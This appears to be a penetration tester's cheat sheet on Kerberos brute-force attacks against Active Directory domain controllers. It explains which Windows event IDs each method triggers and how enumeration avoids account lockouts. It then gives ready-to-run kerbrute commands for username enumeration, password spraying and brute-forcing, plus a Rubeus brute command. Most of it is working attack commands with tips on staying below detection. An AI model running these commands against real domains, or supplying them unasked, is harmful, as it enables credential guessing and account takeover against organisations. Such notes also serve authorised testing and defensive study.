1. Kerberos brute-force
- no domain account required; just network connectivity to the KDC (a DC)
- Kerberos pre-auth failures are not logged in AD as a normal logon failure (event 4625) but as a specific Kerberos pre-authentication failure (event 4771)
- still increments the account's failed-login count, so lockout policy applies
- the KDC's response reveals whether the username exists, whether or not the supplied password is correct
- good for:
  - brute-forcing user:pass combos, or a single user against a wordlist
  - enumerating usernames
  - password spraying against a userlist
  - discovering accounts that do not require pre-auth, which is what AS-REP roasting relies on
NOTE: a brute-force attack is always susceptible to detection and blocking, so it should be used with care.
Tools: kerbrute (Linux/Windows), Rubeus (Windows)
Linux
~/scripts/kerbrute userenum --dc $IP -d DOMAIN USERLIST
userenum is “safe” to run in that it causes no login failures and therefore no account lockouts; it only generates event ID 4768, which records that a Kerberos authentication ticket (TGT) was requested.
~/scripts/kerbrute passwordspray --dc $IP -d DOMAIN USERLIST PASSWORD
~/scripts/kerbrute bruteuser --dc $IP -d DOMAIN PASSWORDLIST USERNAME
cat CREDS | ~/scripts/kerbrute bruteforce --dc $IP -d DOMAIN -
Windows
.\Rubeus.exe brute /users:USERLIST /passwords:PASSWORDLIST /domain:DOMAIN /outfile:FILE